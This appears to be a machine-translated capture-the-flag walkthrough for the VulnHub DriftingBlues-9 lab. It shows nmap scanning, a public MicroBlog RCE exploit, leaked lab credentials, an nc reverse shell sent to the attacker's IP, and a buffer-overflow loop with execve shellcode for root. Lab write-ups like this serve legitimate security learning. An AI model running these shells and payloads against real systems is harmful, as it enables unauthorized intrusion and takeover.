After reading this article, I will teach you to play with the penetration test target vulnhub - drivetingblues-9

Vulnhub Introduction to target machine ：

vulnhub It is a comprehensive shooting range providing various vulnerability platforms , A variety of virtual machines can be downloaded , Local VM Open the can , Complete the penetration test like a game 、 Raise the right 、 Exploit 、 Code audit and other interesting actual combat .

Update this issue Vulnhub DriftingBlues series I still found it as usual FLAG that will do , May be biased towards CTF spot .

Vulnhub Target download ：

Official website address ：https://www.vulnhub.com/entry/driftingblues-9-final,695/


After downloading, unzip the installation package Then try VMware that will do .

Vulnhub Detailed explanation of target vulnerability ：

①： information gathering ：

kali Use in netdiscover Discover the host

Infiltration machine ：kali IP ：192.168.205.133 Drone aircraft IP ：192.168.205.145

Use command ：nmap -sS -A -T4 -n 192.168.205.145

Open the 80 Port and 111 port As usual, visit first 80 port Look directly at the source code Found out ApPHP MicroBlog edition by v.1.0.1（ The first time I met ）

②： Exploit ：

Use searchsploit Search for related vulnerabilities The second one can be used

Use the command to copy the script to the local ：searchsploit -m php/webapps/33070.py

Use python2 Execute the script ：python2 ./33070.py http://192.168.205.145

Found database information There is an account number and password Namely ：clapton/yaraklitepe

Use command ：ls /home Discovery is the same as data users It's fine too cat /etc/passwd Check to see if there is nc： whish nc

③： rebound shell：

stay kali Turn on nc monitor ：nc -lvp 6666

stay shell perform ：nc 192.168.205.133 6666 -e /bin/bash

Use command interaction shell：python -c 'import pty;pty.spawn("/bin/bash")'

Try switching users ：clapton / yaraklitepe Got the first flag

④： Buffer overflow right extraction ：

Tips here Buffer is the solution （ What buffer ！！！ The first encounter will not pwn）

for i in {
    1..10000}; do (./input $(python -c 'print("A" * 171 + "\x10\x0c\x97\xbf" + "\x90"* 1000 + "\x31\xc9\xf7\xe1\x51\xbf\xd0\xd0\x8c\x97\xbe\xd0\x9d\x96\x91\xf7\xd7\xf7\xd6\x57\x56\x89\xe3\xb0\x0b\xcd\x80")')); done

Specific reference ：https://www.ngui.cc/article/show-373956.html
https://blog.csdn.net/qq_32261191/article/details/117908644

⑤： obtain flag：

So far, we have obtained all flag, End of penetration test .

Vulnhub Target penetration summary ：

①：searchsploit Tool usage
②：RCE Exploit
③： Buffer overflow right extraction （ Because there is no foundation, it is not very Follow up in learning ）

This is also DriftingBlues Study of the last target aircraft in the series , I hope you can also learn some new knowledge points and some penetration testing ideas
Finally, creation is not easy I hope that's helpful ！！